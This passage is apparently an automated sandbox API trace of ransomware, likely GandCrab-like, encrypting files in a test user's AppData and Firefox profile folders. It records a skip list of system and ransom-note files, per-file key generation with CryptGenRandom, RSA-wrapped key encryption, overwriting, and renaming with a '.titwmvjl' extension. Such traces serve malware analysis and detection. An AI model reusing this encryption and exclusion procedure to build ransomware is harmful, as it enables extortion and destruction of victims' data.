lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0085.374] lstrcmpW (lpString1="profiles.ini", lpString2=".") returned 1 [0085.374] lstrcmpW (lpString1="profiles.ini", lpString2="..") returned 1 [0085.374] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0085.374] lstrlenW (lpString=".titwmvjl") returned 9 [0085.375] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.375] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.376] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.titwmvjl") returned 75 [0085.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.376] lstrlenW (lpString=".ini") returned 4 [0085.376] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.377] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0085.377] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0085.377] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="desktop.ini") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="autorun.inf") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="iconcache.db") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="bootsect.bak") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="boot.ini") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat.log") returned 1 [0085.377] lstrcmpiW (lpString1="profiles.ini", lpString2="thumbs.db") returned -1 [0085.378] lstrcmpiW (lpString1="profiles.ini", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="CRAB-DECRYPT.html") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="ntldr") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="NTDETECT.COM") returned 1 [0085.379] lstrcmpiW (lpString1="profiles.ini", lpString2="Bootfont.bin") returned 1 [0085.379] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.379] lstrlenW (lpString=".ini") returned 4 [0085.379] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.380] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ini ") returned 5 [0085.380] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.380] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.381] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0085.382] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0085.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.382] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0085.385] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.385] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.386] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.386] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0085.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.386] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.386] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.387] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0085.389] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.389] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.390] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.390] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0085.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.390] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.390] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.392] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0085.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.394] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037f8) returned 1 [0085.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.395] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0085.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.395] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0085.396] GetLastError () returned 0x0 [0085.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.396] CryptDestroyKey (hKey=0x5037f8) returned 1 [0085.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.396] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.396] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0085.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.399] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034f8) returned 1 [0085.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.399] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0085.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.399] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0085.400] GetLastError () returned 0x0 [0085.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.400] CryptDestroyKey (hKey=0x5034f8) returned 1 [0085.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.400] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.401] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x7a, lpOverlapped=0x0) returned 1 [0085.422] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffff86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.422] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x7a, lpOverlapped=0x0) returned 1 [0085.425] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.425] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0085.429] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.434] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.434] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.435] CloseHandle (hObject=0x2c4) returned 1 [0085.436] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.titwmvjl"), dwFlags=0x1) returned 1 [0085.454] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.454] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0085.454] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0085.454] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0085.454] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt" [0085.454] lstrlenW (lpString=".titwmvjl") returned 9 [0085.455] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt") returned 74 [0085.455] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.455] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0085.455] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt") returned 74 [0085.455] lstrlenW (lpString=".txt") returned 4 [0085.455] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.455] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0085.455] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0085.456] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.456] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt") returned 74 [0085.456] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\TITWMVJL-DECRYPT.txt") returned 74 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0085.456] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0085.456] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.456] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0085.457] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0085.458] CloseHandle (hObject=0x2bc) returned 1 [0085.458] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0085.458] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0085.458] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0085.458] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt" [0085.459] lstrlenW (lpString=".titwmvjl") returned 9 [0085.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt") returned 66 [0085.459] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.459] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 75 [0085.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt") returned 66 [0085.459] lstrlenW (lpString=".txt") returned 4 [0085.459] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.459] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0085.459] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0085.459] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt") returned 66 [0085.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\TITWMVJL-DECRYPT.txt") returned 66 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0085.460] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0085.460] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.460] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0085.460] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0085.461] CloseHandle (hObject=0x2b4) returned 1 [0085.461] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.461] lstrcmpW (lpString1="OQRDlux1AASf2Yv.png", lpString2=".") returned 1 [0085.461] lstrcmpW (lpString1="OQRDlux1AASf2Yv.png", lpString2="..") returned 1 [0085.461] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="OQRDlux1AASf2Yv.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png" [0085.461] lstrlenW (lpString=".titwmvjl") returned 9 [0085.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned 57 [0085.462] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.462] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png.titwmvjl") returned 66 [0085.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned 57 [0085.462] lstrlenW (lpString=".png") returned 4 [0085.462] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.462] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0085.462] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0085.462] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned 57 [0085.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned 57 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="desktop.ini") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="autorun.inf") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="ntuser.dat") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="iconcache.db") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="bootsect.bak") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="boot.ini") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="ntuser.dat.log") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="thumbs.db") returned -1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="KRAB-DECRYPT.html") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="CRAB-DECRYPT.html") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="ntldr") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="NTDETECT.COM") returned 1 [0085.463] lstrcmpiW (lpString1="OQRDlux1AASf2Yv.png", lpString2="Bootfont.bin") returned 1 [0085.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png") returned 57 [0085.463] lstrlenW (lpString=".png") returned 4 [0085.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.463] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0085.464] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.464] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.464] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\oqrdlux1aasf2yv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.465] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.465] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.466] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.467] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.469] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.469] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.469] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.469] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.469] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.469] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.470] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.472] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.473] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.473] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.473] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.473] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.473] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.474] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.476] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0085.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.477] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.477] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.478] GetLastError () returned 0x0 [0085.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.478] CryptDestroyKey (hKey=0x503638) returned 1 [0085.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.478] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.478] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.481] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, 